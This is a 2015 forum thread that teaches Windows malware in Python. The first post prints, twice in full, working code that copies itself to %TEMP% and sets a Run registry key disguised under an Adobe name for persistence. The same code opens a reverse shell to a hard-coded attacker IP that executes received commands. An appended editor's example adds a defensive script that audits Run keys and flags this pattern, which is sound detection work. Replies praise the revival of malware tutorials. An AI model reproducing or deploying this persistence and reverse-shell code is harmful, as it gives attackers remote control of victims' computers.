Post: [Python] Malware thread.
10-11-2015, 11:18 AM #1
Python
Bebe Snek
This thread will be updated with a new tutorial every 3 days. Now most of the tutorials will be mine and some of them will come from my ebook collection. But I hope you guys enjoy.


This tutorial demonstrates some proofs of concept for creating malware using Python and PyInstaller. So let's get into it.

One of the most common things you’ll find with malware is it wanting to gain persistence on the victim. There are loads of ways to achieve persistence on Windows, one of the more common being to modify the following registry key: “Software\Microsoft\Windows\CurrentVersion\Run”. Below is a quick screenshot of the Python code to copy the program to the %TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer.

    import sys, base64, os, socket, subprocess
    from _winreg import *


    def autorun(tempdir, fileName, run):
        # Copy executable to %TEMP%:
        os.system('copy %s %s' % (fileName, tempdir))

        # Queries Windows registry for key values
        # Appends autorun key to runkey array
        key = OpenKey(HKEY_LOCAL_MACHINE, run)
        runkey = []
        try:
            i = 0
            while True:
                subkey = EnumValue(key, i)
                runkey.append(subkey[0])
                i += 1
        except WindowsError:
            pass

        # Set autorun key:
        if 'Adobe ReaderX' not in runkey:
            try:
                key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
                SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
                key.Close()
            except WindowsError:
                pass


Now that we have copied this file over to the %TEMP% directory and set up persistence, we can execute the next portion of the code, the reverse shell.

    def shell():
        # Base64 encoded reverse shell
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.56.1', int(443)))
        s.send('[*] Connection Established!')
        while 1:
            data = s.recv(1024)
            if data == "quit": break
            proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            stdout_value = proc.stdout.read() + proc.stderr.read()
            encoded = base64.b64encode(stdout_value)
            s.send(encoded)
            # s.send(stdout_value)
        s.close()


    def main():
        tempdir = '%TEMP%'
        fileName = sys.argv[0]
        run = "Software\Microsoft\Windows\CurrentVersion\Run"
        autorun(tempdir, fileName, run)
        shell()


    if __name__ == "__main__":
        main()


Now when this program executes it will open up a reverse shell back to the “attacker”, which in this case is a hard-coded IP in the script, but it could easily be a domain, or maybe something in the Amazon cloud. Below is a quick screenshot demonstrating the program executing on a Windows host and connecting back to the attacker. You can notice the network traffic is base64 encoded:


Here is the full code:

    import sys, base64, os, socket, subprocess
    from _winreg import *


    def autorun(tempdir, fileName, run):
        # Copy executable to %TEMP%:
        os.system('copy %s %s' % (fileName, tempdir))

        # Queries Windows registry for the autorun key value
        # Stores the key values in runkey array
        key = OpenKey(HKEY_LOCAL_MACHINE, run)
        runkey = []
        try:
            i = 0
            while True:
                subkey = EnumValue(key, i)
                runkey.append(subkey[0])
                i += 1
        except WindowsError:
            pass

        # If the autorun key "Adobe ReaderX" isn't set this will set the key:
        if 'Adobe ReaderX' not in runkey:
            try:
                key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
                SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
                key.Close()
            except WindowsError:
                pass


    def shell():
        # Base64 encoded reverse shell
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.56.1', int(443)))
        s.send('[*] Connection Established!')
        while 1:
            data = s.recv(1024)
            if data == "quit": break
            proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            stdout_value = proc.stdout.read() + proc.stderr.read()
            encoded = base64.b64encode(stdout_value)
            s.send(encoded)
            # s.send(stdout_value)
        s.close()


    def main():
        tempdir = '%TEMP%'
        fileName = sys.argv[0]
        run = "Software\Microsoft\Windows\CurrentVersion\Run"
        autorun(tempdir, fileName, run)
        shell()


    if __name__ == "__main__":
        main()


--End of tutorial 1!

Tutorial 2 coming soon!
Last edited by Python ; 10-12-2015 at 04:11 AM.

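Editor's added example, from the defender's side and not code from the post above: a small audit over Run-key entries that flags the persistence pattern the tutorial uses, an image dropped in %TEMP% under a value name borrowed from a well-known vendor. The registry entries, the environment-variable expansions and the "user" profile path are all constructed for the example; on a live host the (name, command) pairs would come from winreg.EnumValue over the HKLM and HKCU Run keys the post names.

```python
# Constructed expansion of environment variables for a hypothetical "user" profile.
ENV = {
    "%temp%": "c:\\users\\user\\appdata\\local\\temp",
    "%tmp%": "c:\\users\\user\\appdata\\local\\temp",
    "%windir%": "c:\\windows",
}
# User-writable directories a vendor autorun almost never lives in, and the
# install roots where software carrying those vendor names normally sits.
SCRATCH_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\system32\\")
VENDOR_HINTS = ("adobe", "microsoft", "java", "google", "intel", "realtek", "nvidia")

def expand(command):
    """Lower-case the command line and expand the environment variables we know about."""
    command = command.lower()
    for var, value in ENV.items():
        command = command.replace(var, value)
    return command

def image_path(command):
    """Return the executable path of a Run value, honouring a quoted path followed by arguments."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]

def classify(name, command):
    """Return the reasons this Run entry resembles the post's autorun(); empty means it looks normal."""
    path = image_path(expand(command))
    reasons = []
    if any(marker in path for marker in SCRATCH_MARKERS):
        reasons.append("image lives in a user-writable scratch directory")
    if any(v in name.lower() for v in VENDOR_HINTS) and not path.startswith(TRUSTED_ROOTS):
        reasons.append("vendor-like value name but image outside the vendor install roots")
    return reasons

def audit(entries):
    """Map each suspicious value name to its reasons, given (name, command) pairs."""
    return {name: classify(name, cmd) for name, cmd in entries if classify(name, cmd)}

# Constructed sample: two ordinary entries plus the value the post's autorun() writes.
SAMPLE_RUN_ENTRIES = [
    ("SecurityHealth", "%windir%\\system32\\SecurityHealthSystray.exe"),
    ("Adobe ARM", '"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe"'),
    ("Adobe_ReaderX", "%TEMP%\\mw.exe"),
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_RUN_ENTRIES).items():
        print("%s -> %s" % (name, "; ".join(reasons)))
```

A second hook for detection is visible in the post's own code: the guard compares 'Adobe ReaderX' against the registry but writes 'Adobe_ReaderX', so it never matches and the Run value is rewritten on every launch, which registry-write auditing will see each time.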
10-11-2015, 07:19 PM #2
Winter
Purple God
NGU used to have a lot of malware tutorials on its forums. I've noticed that there are barely any compared to what there used to be, so it's nice to see someone's trying to revive that part. You making two threads?
10-12-2015, 12:16 AM #3
Python
Bebe Snek
Originally posted by Winter:
NGU used to have a lot of malware tutorials on its forums. I've noticed that there are barely any compared to what there used to be, so it's nice to see someone's trying to revive that part. You making two threads?


Yes. One malware and one Ethical Hacking. They will be the biggest threads that I'm going to try and update every two days with new material.
